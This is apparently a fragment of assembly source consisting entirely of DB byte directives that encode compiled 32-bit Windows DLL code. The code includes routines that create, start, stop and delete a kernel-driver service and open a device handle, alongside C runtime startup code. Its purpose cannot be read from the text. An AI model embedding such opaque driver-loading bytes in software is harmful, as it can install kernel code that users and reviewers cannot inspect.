DB 000H,05FH,05EH,0C2H,00CH,000H,033H,0F6H,0BFH,0FFH,0FFH,000H,000H,066H,039H
DB 03CH,075H,030H,060H,000H,010H,074H,006H,056H,0E8H,0D0H,0FEH,0FFH,0FFH,046H
DB 081H,0FEH,000H,020H,000H,000H,072H,0E7H,0B8H,001H,000H,000H,000H,05FH,05EH
DB 0C2H,00CH,000H,068H,030H,0A0H,000H,010H,0BFH,030H,0A0H,000H,010H,068H,0E8H
DB 003H,000H,000H,0FFH,015H,04CH,0C1H,000H,010H,0B9H,0FFH,0FFH,0FFH,0FFH,02BH
DB 0C0H,0F2H,0AEH,0F7H,0D1H,080H,0B9H,02FH,0A0H,000H,010H,05CH,074H,033H,0BFH
DB 050H,050H,000H,010H,0B9H,0FFH,0FFH,0FFH,0FFH,02BH,0C0H,0F2H,0AEH,0F7H,0D1H
DB 02BH,0F9H,08BH,0D1H,08BH,0F7H,0B9H,0FFH,0FFH,0FFH,0FFH,0BFH,030H,0A0H,000H
DB 010H,02BH,0C0H,0F2H,0AEH,04FH,08BH,0CAH,0C1H,0E9H,002H,0F3H,0A5H,08BH,0CAH
DB 083H,0E1H,003H,0F3H,0A4H,0BFH,040H,050H,000H,010H,0B9H,0FFH,0FFH,0FFH,0FFH
DB 02BH,0C0H,0F2H,0AEH,0F7H,0D1H,02BH,0F9H,08BH,0D1H,08BH,0F7H,0B9H,0FFH,0FFH
DB 0FFH,0FFH,0BFH,030H,0A0H,000H,010H,02BH,0C0H,0F2H,0AEH,04FH,08BH,0CAH,0C1H
DB 0E9H,002H,0F3H,0A5H,08BH,0CAH,083H,0E1H,003H,0F3H,0A4H,0BFH,030H,060H,000H
DB 010H,0B8H,0FFH,0FFH,0FFH,0FFH,0B9H,000H,010H,000H,000H,0F3H,0ABH,0B8H,001H
DB 000H,000H,000H,05FH,05EH,0C2H,00CH,000H,0CCH,0CCH,0CCH,056H,057H,068H,03FH
DB 000H,00FH,000H,06AH,000H,06AH,000H,0FFH,015H,02CH,0C1H,000H,010H,08BH,0F8H
DB 08BH,074H,024H,00CH,08BH,044H,024H,010H,050H,056H,057H,0E8H,02DH,000H,000H
DB 000H,083H,0C4H,00CH,056H,057H,0E8H,063H,000H,000H,000H,08BH,04CH,024H,01CH
DB 083H,0C4H,008H,051H,056H,0E8H,0B5H,000H,000H,000H,083H,0C4H,008H,08BH,0F0H
DB 057H,0FFH,015H,030H,0C1H,000H,010H,08BH,0C6H,05FH,05EH,0C3H,0CCH,0CCH,0CCH
DB 0CCH,08BH,044H,024H,00CH,06AH,000H,06AH,000H,06AH,000H,06AH,000H,06AH,000H
DB 050H,06AH,001H,08BH,044H,024H,024H,06AH,003H,08BH,04CH,024H,024H,06AH,001H
DB 068H,0FFH,001H,00FH,000H,050H,050H,051H,0FFH,015H,03CH,0C1H,000H,010H,085H
DB 0C0H,075H,003H,033H,0C0H,0C3H,050H,0FFH,015H,030H,0C1H,000H,010H,0B8H,001H
DB 000H,000H,000H,0C3H,0CCH,08BH,044H,024H,008H,056H,08BH,04CH,024H,008H,057H
DB 068H,0FFH,001H,00FH,000H,050H,051H,0FFH,015H,038H,0C1H,000H,010H,08BH,0F8H
DB 085H,0FFH,075H,005H,033H,0C0H,05FH,05EH,0C3H,06AH,000H,06AH,000H,057H,0FFH
DB 015H,034H,0C1H,000H,010H,085H,0C0H,075H,012H,0BEH,000H,000H,000H,000H,0FFH
DB 015H,048H,0C1H,000H,010H,03DH,020H,004H,000H,000H,075H,005H,0BEH,001H,000H
DB 000H,000H,057H,0FFH,015H,030H,0C1H,000H,010H,08BH,0C6H,05FH,05EH,0C3H,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,08BH,044H,024H,004H
DB 083H,0ECH,040H,08DH,04CH,024H,000H,050H,068H,054H,050H,000H,010H,051H,0FFH
DB 015H,0F0H,0C1H,000H,010H,083H,0C4H,00CH,08DH,04CH,024H,000H,06AH,000H,068H
DB 080H,000H,000H,000H,06AH,003H,06AH,000H,06AH,000H,068H,000H,000H,000H,0C0H
DB 051H,0FFH,015H,044H,0C1H,000H,010H,083H,0F8H,0FFH,075H,006H,033H,0C0H,083H
DB 0C4H,040H,0C3H,08BH,04CH,024H,048H,085H,0C9H,074H,00BH,089H,001H,0B8H,001H
DB 000H,000H,000H,083H,0C4H,040H,0C3H,050H,0FFH,015H,090H,0C1H,000H,010H,0B8H
DB 001H,000H,000H,000H,083H,0C4H,040H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,056H,057H,068H,03FH,000H,00FH,000H,06AH,000H,06AH,000H,0FFH
DB 015H,02CH,0C1H,000H,010H,08BH,0F8H,08BH,074H,024H,00CH,056H,057H,0E8H,022H
DB 000H,000H,000H,083H,0C4H,008H,056H,057H,0E8H,068H,000H,000H,000H,083H,0C4H
DB 008H,057H,0FFH,015H,030H,0C1H,000H,010H,0B8H,001H,000H,000H,000H,05FH,05EH
DB 0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,08BH,044H,024H,008H,08BH,04CH,024H,004H
DB 083H,0ECH,01CH,056H,057H,068H,0FFH,001H,00FH,000H,050H,051H,0FFH,015H,038H
DB 0C1H,000H,010H,08BH,0F8H,085H,0FFH,075H,008H,033H,0C0H,05FH,05EH,083H,0C4H
DB 01CH,0C3H,08DH,044H,024H,008H,050H,06AH,001H,057H,0FFH,015H,028H,0C1H,000H
DB 010H,08BH,0F0H,057H,0FFH,015H,030H,0C1H,000H,010H,08BH,0C6H,05FH,05EH,083H
DB 0C4H,01CH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,08BH,044H,024H
DB 008H,056H,08BH,04CH,024H,008H,057H,068H,0FFH,001H,00FH,000H,050H,051H,0FFH
DB 015H,038H,0C1H,000H,010H,08BH,0F0H,085H,0F6H,075H,005H,033H,0C0H,05FH,05EH
DB 0C3H,056H,0FFH,015H,024H,0C1H,000H,010H,08BH,0F8H,056H,0FFH,015H,030H,0C1H
DB 000H,010H,08BH,0C7H,05FH,05EH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,08BH,044H,024H,008H,083H,0F8H,001H,00FH,085H,0ECH,000H,000H,000H,0FFH
DB 015H,06CH,0C1H,000H,010H,083H,03DH,070H,050H,000H,010H,000H,0A3H,090H,050H
DB 000H,010H,075H,03EH,03CH,003H,075H,011H,0A9H,000H,000H,000H,080H,074H,00AH
DB 06AH,002H,0E8H,0BDH,00FH,000H,000H,083H,0C4H,004H,068H,07CH,050H,000H,010H
DB 0FFH,015H,068H,0C1H,000H,010H,085H,0C0H,074H,01AH,068H,074H,050H,000H,010H
DB 050H,0FFH,015H,064H,0C1H,000H,010H,085H,0C0H,074H,00AH,06AH,001H,0E8H,094H
DB 00FH,000H,000H,083H,0C4H,004H,0E8H,0FCH,004H,000H,000H,033H,0C9H,08BH,015H
DB 090H,050H,000H,010H,08AH,0CEH,08BH,0C2H,025H,0FFH,000H,000H,000H,0FFH,005H
DB 05CH,050H,000H,010H,0C1H,0EAH,010H,089H,00DH,09CH,050H,000H,010H,0A3H,098H
DB 050H,000H,010H,089H,015H,090H,050H,000H,010H,0C1H,0E0H,008H,003H,0C1H,0A3H
DB 094H,050H,000H,010H,0E8H,0F2H,002H,000H,000H,085H,0C0H,075H,00AH,0E8H,0D9H
DB 004H,000H,000H,033H,0C0H,0C2H,00CH,000H,0FFH,015H,060H,0C1H,000H,010H,0A3H
DB 040H,0B5H,000H,010H,0E8H,094H,00DH,000H,000H,083H,03DH,040H,0B5H,000H,010H
DB 000H,0A3H,060H,050H,000H,010H,074H,025H,085H,0C0H,074H,021H,0E8H,0BDH,004H
DB 000H,000H,0E8H,068H,00DH,000H,000H,0E8H,0D3H,007H,000H,000H,0E8H,0EEH,006H
DB 000H,000H,0E8H,079H,001H,000H,000H,0B8H,001H,000H,000H,000H,0C2H,00CH,000H
DB 0E8H,08CH,004H,000H,000H,033H,0C0H,0C2H,00CH,000H,085H,0C0H,075H,039H,0A1H
DB 05CH,050H,000H,010H,085H,0C0H,07EH,02BH,048H,083H,03DH,0C8H,050H,000H,010H
DB 000H,0A3H,05CH,050H,000H,010H,075H,005H,0E8H,096H,001H,000H,000H,0E8H,051H
DB 006H,000H,000H,0E8H,0CCH,002H,000H,000H,0E8H,057H,004H,000H,000H,0B8H,001H
DB 000H,000H,000H,0C2H,00CH,000H,033H,0C0H,0C2H,00CH,000H,083H,0F8H,003H,075H
DB 00AH,06AH,000H,0E8H,06EH,003H,000H,000H,083H,0C4H,004H,0B8H,001H,000H,000H
DB 000H,0C2H,00CH,000H,0CCH,0CCH,0CCH,053H,056H,057H,0BBH,001H,000H,000H,000H
DB 08BH,07CH,024H,014H,055H,03BH,0FBH,075H,02AH,001H,01DH,05CH,050H,000H,010H
DB 083H,0FFH,001H,074H,005H,083H,0FFH,002H,075H,050H,0A1H,044H,0B5H,000H,010H
DB 085H,0C0H,074H,02FH,08BH,06CH,024H,01CH,08BH,074H,024H,014H,055H,057H,056H
DB 0FFH,0D0H,08BH,0D8H,0EBH,026H,085H,0FFH,075H,0D8H,0A1H,05CH,050H,000H,010H
DB 085H,0C0H,07EH,008H,048H,0A3H,05CH,050H,000H,010H,0EBH,0C7H,033H,0C0H,05DH
DB 05FH,05EH,05BH,0C2H,00CH,000H,08BH,074H,024H,014H,08BH,06CH,024H,01CH,085H
DB 0DBH,074H,022H,055H,057H,056H,0E8H,043H,0FEH,0FFH,0FFH,08BH,0D8H,0EBH,008H
DB 08BH,074H,024H,014H,08BH,06CH,024H,01CH,085H,0DBH,074H,00EH,055H,057H,056H
DB 0E8H,00BH,0FBH,0FFH,0FFH,08BH,0D8H,085H,0DBH,075H,00FH,083H,0FFH,001H,075H
DB 00AH,0E8H,00BH,002H,000H,000H,0E8H,096H,003H,000H,000H,085H,0FFH,074H,005H
DB 083H,0FFH,003H,075H,022H,055H,057H,056H,0E8H,005H,0FEH,0FFH,0FFH,085H,0C0H
DB 075H,002H,033H,0DBH,085H,0DBH,074H,010H,0A1H,044H,0B5H,000H,010H,085H,0C0H
DB 074H,007H,055H,057H,056H,0FFH,0D0H,08BH,0D8H,08BH,0C3H,05DH,05FH,05EH,05BH
DB 0C2H,00CH,000H,0CCH,0CCH,0A1H,06CH,050H,000H,010H,083H,0F8H,001H,074H,00DH
DB 085H,0C0H,075H,00EH,083H,03DH,070H,050H,000H,010H,001H,075H,005H,0E8H,0C4H
DB 00DH,000H,000H,08BH,044H,024H,004H,050H,0E8H,0FAH,00DH,000H,000H,083H,0C4H
DB 004H,068H,0FFH,000H,000H,000H,0FFH,015H,068H,050H,000H,010H,083H,0C4H,004H
DB 0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0A1H,038H,0B5H,000H,010H,085H
DB 0C0H,074H,002H,0FFH,0D0H,068H,010H,050H,000H,010H,068H,008H,050H,000H,010H
DB 0E8H,0F6H,000H,000H,000H,083H,0C4H,008H,068H,004H,050H,000H,010H,068H,000H
DB 050H,000H,010H,0E8H,0E4H,000H,000H,000H,083H,0C4H,008H,0C3H,08BH,044H,024H
DB 004H,06AH,000H,06AH,001H,050H,0E8H,022H,000H,000H,000H,083H,0C4H,00CH,0C3H
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,06AH
DB 001H,06AH,000H,06AH,000H,0E8H,005H,000H,000H,000H,083H,0C4H,00CH,0C3H,0CCH
DB 053H,056H,0E8H,089H,000H,000H,000H,0C7H,005H,0C8H,050H,000H,010H,001H,000H
DB 000H,000H,083H,07CH,024H,010H,000H,08BH,05CH,024H,014H,088H,01DH,0C4H,050H
DB 000H,010H,075H,03FH,083H,03DH,03CH,0B5H,000H,010H,000H,074H,024H,08BH,035H
DB 034H,0B5H,000H,010H,083H,0EEH,004H,03BH,035H,03CH,0B5H,000H,010H,072H,013H
DB 08BH,006H,085H,0C0H,074H,002H,0FFH,0D0H,083H,0EEH,004H,03BH,035H,03CH,0B5H
DB 000H,010H,073H,0EDH,068H,01CH,050H,000H,010H,068H,014H,050H,000H,010H,0E8H
DB 052H,000H,000H,000H,083H,0C4H,008H,068H,024H,050H,000H,010H,068H,020H,050H
DB 000H,010H,0E8H,040H,000H,000H,000H,083H,0C4H,008H,085H,0DBH,074H,008H,0E8H
DB 024H,000H,000H,000H,05EH,05BH,0C3H,08BH,044H,024H,00CH,050H,0FFH,015H,070H
DB 0C1H,000H,010H,05EH,05BH,0C3H,0CCH,0CCH,0CCH,06AH,00DH,0E8H,079H,00FH,000H
DB 000H,083H,0C4H,004H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,06AH,00DH,0E8H,0D9H,00FH
DB 000H,000H,083H,0C4H,004H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,056H,057H,08BH,07CH
DB 024H,010H,08BH,074H,024H,00CH,03BH,0FEH,076H,00FH,08BH,006H,085H,0C0H,074H
DB 002H,0FFH,0D0H,083H,0C6H,004H,03BH,0FEH,077H,0F1H,05FH,05EH,0C3H,056H,0E8H
DB 09AH,00EH,000H,000H,0FFH,015H,07CH,0C1H,000H,010H,0A3H,0CCH,050H,000H,010H
DB 083H,0F8H,0FFH,075H,004H,033H,0C0H,05EH,0C3H,06AH,074H,06AH,001H,0E8H,08DH
DB 010H,000H,000H,083H,0C4H,008H,08BH,0F0H,085H,0F6H,074H,030H,056H,0A1H,0CCH
DB 050H,000H,010H,050H,0FFH,015H,078H,0C1H,000H,010H,085H,0C0H,074H,01FH,056H
DB 0E8H,04DH,000H,000H,000H,083H,0C4H,004H,0FFH,015H,074H,0C1H,000H,010H,089H
DB 006H,0B8H,001H,000H,000H,000H,0C7H,046H,004H,0FFH,0FFH,0FFH,0FFH,05EH,0C3H
DB 033H,0C0H,05EH,0C3H,0E8H,06BH,00EH,000H,000H,0A1H,0CCH,050H,000H,010H,083H
DB 0F8H,0FFH,074H,011H,050H,0FFH,015H,080H,0C1H,000H,010H,0C7H,005H,0CCH,050H
DB 000H,010H,0FFH,0FFH,0FFH,0FFH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,08BH,044H,024H,004H,0C7H,040H,050H,038H
DB 057H,000H,010H,0C7H,040H,014H,001H,000H,000H,000H,0C3H,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,056H,057H,0FFH,015H,048H,0C1H
DB 000H,010H,08BH,0F0H,0A1H,0CCH,050H,000H,010H,050H,0FFH,015H,088H,0C1H,000H
DB 010H,08BH,0F8H,085H,0FFH,075H,047H,06AH,074H,06AH,001H,0E8H,0DBH,00FH,000H
DB 000H,083H,0C4H,008H,08BH,0F8H,085H,0FFH,074H,02BH,057H,0A1H,0CCH,050H,000H
DB 010H,050H,0FFH,015H,078H,0C1H,000H,010H,085H,0C0H,074H,01AH,057H,0E8H,09BH
DB 0FFH,0FFH,0FFH,083H,0C4H,004H,0FFH,015H,074H,0C1H,000H,010H,089H,007H,0C7H
DB 047H,004H,0FFH,0FFH,0FFH,0FFH,0EBH,00AH,06AH,010H,0E8H,080H,0FDH,0FFH,0FFH
DB 083H,0C4H,004H,056H,0FFH,015H,084H,0C1H,000H,010H,08BH,0C7H,05FH,05EH,0C3H
DB 0CCH,083H,03DH,0CCH,050H,000H,010H,0FFH,056H,00FH,084H,091H,000H,000H,000H
DB 08BH,074H,024H,008H,085H,0F6H,075H,012H,0A1H,0CCH,050H,000H,010H,050H,0FFH
DB 015H,088H,0C1H,000H,010H,08BH,0F0H,085H,0F6H,074H,069H,08BH,046H,024H,085H
DB 0C0H,074H,009H,050H,0E8H,0BBH,00FH,000H,000H,083H,0C4H,004H,08BH,046H,028H
DB 085H,0C0H,074H,009H,050H,0E8H,0ABH,00FH,000H,000H,083H,0C4H,004H,08BH,046H
DB 030H,085H,0C0H,074H,009H,050H,0E8H,09BH,00FH,000H,000H,083H,0C4H,004H,08BH
DB 046H,038H,085H,0C0H,074H,009H,050H,0E8H,08BH,00FH,000H,000H,083H,0C4H,004H
DB 08BH,046H,040H,085H,0C0H,074H,009H,050H,0E8H,07BH,00FH,000H,000H,083H,0C4H
DB 004H,08BH,046H,044H,085H,0C0H,074H,009H,050H,0E8H,06BH,00FH,000H,000H,083H
DB 0C4H,004H,056H,0E8H,062H,00FH,000H,000H,083H,0C4H,004H,06AH,000H,0A1H,0CCH
DB 050H,000H,010H,050H,0FFH,015H,078H,0C1H,000H,010H,05EH,0C3H,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,06AH,000H,068H
DB 000H,010H,000H,000H,06AH,000H,0FFH,015H,08CH,0C1H,000H,010H,0A3H,030H,0B5H
DB 000H,010H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0A1H
DB 030H,0B5H,000H,010H,050H,0FFH,015H,054H,0C1H,000H,010H,0C3H,0CCH,0CCH,0CCH
DB 083H,0ECH,044H,053H,056H,057H,055H,068H,080H,004H,000H,000H,0E8H,01FH,00FH
DB 000H,000H,083H,0C4H,004H,08BH,0F0H,085H,0F6H,075H,00AH,06AH,01BH,0E8H,06FH
DB 0FCH,0FFH,0FFH,083H,0C4H,004H,08DH,086H,080H,004H,000H,000H,089H,035H,030H
DB 0B4H,000H,010H,0C7H,005H,020H,0B4H,000H,010H,020H,000H,000H,000H,03BH,0C6H
DB 076H,028H,033H,0C9H,0BAH,00AH,000H,000H,000H,088H,04EH,004H,083H,0C6H,024H
DB 0C7H,046H,0DCH,0FFH,0FFH,0FFH,0FFH,088H,056H,0E1H,089H,04EH,0E4H,0A1H,030H
DB 0B4H,000H,010H,005H,080H,004H,000H,000H,03BH,0C6H,077H,0DFH,08DH,044H,024H
DB 010H,050H,0FFH,015H,0A0H,0C1H,000H,010H,066H,083H,07CH,024H,042H,000H,00FH
DB 084H,0D5H,000H,000H,000H,083H,07CH,024H,044H,000H,00FH,084H,0CAH,000H,000H
DB 000H,08BH,044H,024H,044H,08BH,028H,08DH,078H,004H,081H,0FDH,000H,008H,000H
DB 000H,08DH,05CH,03DH,000H,07CH,005H,0BDH,000H,008H,000H,000H,039H,02DH,020H
DB 0B4H,000H,010H,07DH,05EH,0BEH,034H,0B4H,000H,010H,068H,080H,004H,000H,000H
DB 0E8H,077H,00EH,000H,000H,083H,0C4H,004H,085H,0C0H,074H,042H,08DH,088H,080H
DB 004H,000H,000H,089H,006H,083H,005H,020H,0B4H,000H,010H,020H,03BH,0C8H,076H
DB 022H,033H,0C9H,088H,048H,004H,083H,0C0H,024H,0C7H,040H,0DCH,0FFH,0FFH,0FFH
DB 0FFH,0C6H,040H,0E1H,00AH,089H,048H,0E4H,08BH,016H,081H,0C2H,080H,004H,000H
DB 000H,03BH,0D0H,077H,0E0H,083H,0C6H,004H,039H,02DH,020H,0B4H,000H,010H,07CH
DB 0AFH,0EBH,006H,08BH,02DH,020H,0B4H,000H,010H,033H,0F6H,085H,0EDH,07EH,044H
DB 08BH,003H,083H,0F8H,0FFH,074H,034H,0F6H,007H,001H,074H,02FH,050H,0FFH,015H
DB 098H,0C1H,000H,010H,085H,0C0H,074H,024H,08BH,0C6H,08BH,0CEH,083H,0E0H,0E7H
DB 083H,0E1H,01FH,0C1H,0F8H,003H,0C1H,0E1H,002H,08BH,090H,030H,0B4H,000H,010H
DB 08BH,003H,08DH,00CH,0C9H,003H,0CAH,089H,001H,08AH,017H,088H,051H,004H,046H
DB 047H,083H,0C3H,004H,03BH,0F5H,07CH,0BCH,033H,0F6H,033H,0FFH,08BH,01DH,030H
DB 0B4H,000H,010H,003H,0DEH,083H,03BH,0FFH,075H,057H,0B8H,0F6H,0FFH,0FFH,0FFH
DB 085H,0F6H,0C6H,043H,004H,081H,074H,00EH,08DH,047H,0FFH,083H,0F8H,001H,0B8H
DB 0F5H,0FFH,0FFH,0FFH,083H,0D0H,0FFH,050H,0FFH,015H,09CH,0C1H,000H,010H,083H
DB 0F8H,0FFH,08BH,0E8H,074H,028H,055H,0FFH,015H,098H,0C1H,000H,010H,085H,0C0H
DB 074H,01DH,025H,0FFH,000H,000H,000H,089H,02BH,083H,0F8H,002H,075H,006H,080H
DB 04BH,004H,040H,0EBH,015H,083H,0F8H,003H,075H,010H,080H,04BH,004H,008H,0EBH
DB 00AH,080H,04BH,004H,040H,0EBH,004H,080H,04BH,004H,080H,083H,0C6H,024H,047H
DB 083H,0FEH,06CH,07CH,08FH,0A1H,020H,0B4H,000H,010H,050H,0FFH,015H,094H,0C1H
DB 000H,010H,05DH,05FH,05EH,05BH,083H,0C4H,044H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH
DB 053H,056H,057H,0BEH,030H,0B4H,000H,010H,055H,08BH,03DH,0A4H,0C1H,000H,010H
DB 08BH,01EH,085H,0DBH,074H,030H,08DH,083H,080H,004H,000H,000H,03BH,0C3H,076H
DB 01BH,033H,0EDH,039H,06BH,008H,074H,006H,08DH,043H,00CH,050H,0FFH,0D7H,083H
DB 0C3H,024H,08BH,006H,005H,080H,004H,000H,000H,03BH,0C3H,077H,0E7H,08BH,006H
DB 050H,0E8H,0EEH,00CH,000H,000H,083H,0C4H,004H,083H,0C6H,004H,081H,0FEH,030H
DB 0B5H,000H,010H,072H,0BFH,05DH,05FH,05EH,05BH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,083H,0ECH,004H,08BH,015H,060H,050H,000H,010H
DB 053H,056H,057H,033H,0F6H,055H,080H,03AH,000H,074H,01AH,080H,03AH,03DH,074H
DB 001H,046H,08BH,0FAH,0B9H,0FFH,0FFH,0FFH,0FFH,02BH,0C0H,0F2H,0AEH,0F7H,0D1H
DB 003H,0D1H,080H,03AH,000H,075H,0E6H,08DH,004H,0B5H,004H,000H,000H,000H,050H
DB 0E8H,0B5H,00CH,000H,000H,0A3H,0ACH,050H,000H,010H,083H,0C4H,004H,08BH,0D8H
DB 085H,0DBH,075H,00AH,06AH,009H,0E8H,000H,0FAH,0FFH,0FFH,083H,0C4H,004H,08BH
DB 02DH,060H,050H,000H,010H,08BH,0C5H,080H,07DH,000H,000H,074H,05EH,08BH,0FDH
DB 0B9H,0FFH,0FFH,0FFH,0FFH,02BH,0C0H,0F2H,0AEH,0F7H,0D1H,089H,04CH,024H,010H
DB 080H,07DH,000H,03DH,074H,03DH,051H,0E8H,072H,00CH,000H,000H,083H,0C4H,004H
DB 089H,003H,085H,0C0H,075H,00AH,06AH,009H,0E8H,0C2H,0F9H,0FFH,0FFH,083H,0C4H
DB 004H,08BH,0FDH,0B9H,0FFH,0FFH,0FFH,0FFH,02BH,0C0H,0F2H,0AEH,0F7H,0D1H,02BH
DB 0F9H,08BH,0C1H,0C1H,0E9H,002H,08BH,0F7H,08BH,03BH,083H,0C3H,004H,0F3H,0A5H
DB 08BH,0C8H,083H,0E1H,003H,0F3H,0A4H,003H,06CH,024H,010H,080H,07DH,000H,000H
DB 075H,0A2H,0A1H,060H,050H,000H,010H,050H,0E8H,006H,00CH,000H,000H,083H,0C4H
DB 004H,0C7H,003H,000H,000H,000H,000H,05DH,05FH,05EH,05BH,083H,0C4H,004H,0C3H
DB 0CCH,0CCH,0CCH,0CCH,0CCH,083H,0ECH,008H,056H,057H,068H,004H,001H,000H,000H
DB 0BEH,0C0H,05EH,000H,010H,056H,06AH,000H,0FFH,015H,05CH,0C1H,000H,010H,0A1H
DB 040H,0B5H,000H,010H,089H,035H,0BCH,050H,000H,010H,080H,038H,000H,074H,006H
DB 08BH,035H,040H,0B5H,000H,010H,08DH,044H,024H,00CH,08DH,04CH,024H,008H,050H
DB 051H,06AH,000H,06AH,000H,056H,0E8H,05EH,000H,000H,000H,08BH,044H,024H,01CH
DB 083H,0C4H,014H,0C1H,0E0H,002H,003H,044H,024H,00CH,050H,0E8H,0BAH,00BH,000H
DB 000H,083H,0C4H,004H,08BH,0F8H,085H,0FFH,075H,00AH,06AH,008H,0E8H,00AH,0F9H
DB 0FFH,0FFH,083H,0C4H,004H,08DH,044H,024H,00CH,08DH,04CH,024H,008H,08BH,054H
DB 024H,008H,050H,051H,08DH,004H,097H,050H,057H,056H,0E8H,01EH,000H,000H,000H
DB 08BH,044H,024H,01CH,083H,0C4H,014H,048H,089H,03DH,0A4H,050H,000H,010H,05FH
DB 0A3H,0A0H,050H,000H,010H,05EH,083H,0C4H,008H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH
DB 08BH,04CH,024H,014H,053H,08BH,054H,024H,014H,056H,08BH,074H,024H,00CH,057H
DB 08BH,044H,024H,018H,055H,083H,07CH,024H,018H,000H,0C7H,001H,000H,000H,000H
DB 000H,0C7H,002H,001H,000H,000H,000H,074H,00BH,08BH,054H,024H,018H,083H,044H
DB 024H,018H,004H,089H,002H,080H,03EH,022H,074H,046H,0FFH,001H,085H,0C0H,074H
DB 005H,08AH,016H,088H,010H,040H,08AH,016H,046H,033H,0DBH,08AH,0DAH,0F6H,083H
DB 001H,051H,000H,010H,004H,074H,00CH,0FFH,001H,085H,0C0H,074H,005H,08AH,01EH
DB 088H,018H,040H,046H,080H,0FAH,020H,074H,009H,084H,0D2H,074H,009H,080H,0FAH
DB 009H,075H,0CBH,084H,0D2H,075H,003H,04EH,0EBH,050H,085H,0C0H,074H,04CH,0C6H
DB 040H,0FFH,000H,0EBH,046H,046H,080H,03EH,022H,074H,030H,08AH,01EH,084H,0DBH
DB 074H,02AH,033H,0D2H,08AH,0D3H,0F6H,082H,001H,051H,000H,010H,004H,074H,00CH
DB 0FFH,001H,085H,0C0H,074H,006H,08AH,016H,046H,088H,010H,040H,0FFH,001H,085H
DB 0C0H,074H,005H,08AH,016H,088H,010H,040H,046H,080H,03EH,022H,075H,0D0H,0FFH
DB 001H,085H,0C0H,074H,004H,0C6H,000H,000H,040H,080H,03EH,022H,075H,001H,046H
DB 033H,0FFH,080H,03EH,000H,00FH,084H,0E8H,000H,000H,000H,08AH,016H,080H,0FAH
DB 020H,074H,005H,080H,0FAH,009H,075H,003H,046H,0EBH,0F1H,080H,03EH,000H,00FH
DB 084H,0D0H,000H,000H,000H,083H,07CH,024H,018H,000H,074H,00BH,08BH,054H,024H
DB 018H,083H,044H,024H,018H,004H,089H,002H,08BH,054H,024H,020H,0FFH,002H,0BBH
DB 001H,000H,000H,000H,033H,0EDH,080H,03EH,05CH,075H,007H,046H,045H,080H,03EH
DB 05CH,074H,0F9H,080H,03EH,022H,075H,024H,0F7H,0C5H,001H,000H,000H,000H,075H
DB 019H,085H,0FFH,074H,00CH,08DH,056H,001H,080H,03AH,022H,075H,004H,08BH,0F2H
DB 0EBH,002H,033H,0DBH,083H,0FFH,001H,01BH,0FFH,0F7H,0DFH,0C1H,0EDH,001H,08BH
DB 0D5H,04DH,085H,0D2H,074H,011H,085H,0C0H,074H,004H,0C6H,000H,05CH,040H,08BH
DB 0D5H,0FFH,001H,04DH,085H,0D2H,075H,0EFH,08AH,016H,084H,0D2H,074H,04FH,085H
DB 0FFH,075H,00AH,080H,0FAH,020H,074H,046H,080H,0FAH,009H,074H,041H,085H,0DBH
DB 074H,037H,085H,0C0H,074H,021H,033H,0DBH,08AH,0DAH,0F6H,083H,001H,051H,000H
DB 010H,004H,074H,006H,088H,010H,046H,040H,0FFH,001H,08AH,016H,040H,046H,088H
DB 050H,0FFH,0FFH,001H,0E9H,06FH,0FFH,0FFH,0FFH,033H,0DBH,08AH,0DAH,0F6H,083H
DB 001H,051H,000H,010H,004H,074H,003H,046H,0FFH,001H,0FFH,001H,046H,0E9H,057H
DB 0FFH,0FFH,0FFH,085H,0C0H,074H,004H,0C6H,000H,000H,040H,0FFH,001H,0E9H,00FH
DB 0FFH,0FFH,0FFH,083H,07CH,024H,018H,000H,074H,00AH,08BH,054H,024H,018H,0C7H
DB 002H,000H,000H,000H,000H,08BH,054H,024H,020H,05DH,05FH,05EH,05BH,0FFH,002H
DB 0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 083H,0ECH,018H,053H,056H,057H,055H,06AH,019H,0E8H,092H,007H,000H,000H,08BH
DB 044H,024H,030H,083H,0C4H,004H,050H,0E8H,015H,002H,000H,000H,083H,0C4H,004H
DB 08BH,0E8H,03BH,02DH,004H,052H,000H,010H,075H,014H,06AH,019H,0E8H,0E1H,007H
DB 000H,000H,083H,0C4H,004H,033H,0C0H,05DH,05FH,05EH,05BH,083H,0C4H,018H,0C3H
DB 085H,0EDH,075H,019H,0E8H,09BH,002H,000H,000H,06AH,019H,0E8H,0C4H,007H,000H
DB 000H,083H,0C4H,004H,033H,0C0H,05DH,05FH,05EH,05BH,083H,0C4H,018H,0C3H,0C7H
DB 044H,024H,010H,000H,000H,000H,000H,0B8H,028H,052H,000H,010H,039H,028H,00FH
DB 084H,09BH,000H,000H,000H,083H,0C0H,030H,0FFH,044H,024H,010H,03DH,018H,053H
DB 000H,010H,072H,0EAH,08DH,044H,024H,014H,050H,055H,0FFH,015H,058H,0C1H,000H
DB 010H,083H,0F8H,001H,00FH,085H,059H,001H,000H,000H,0BFH,000H,051H,000H,010H
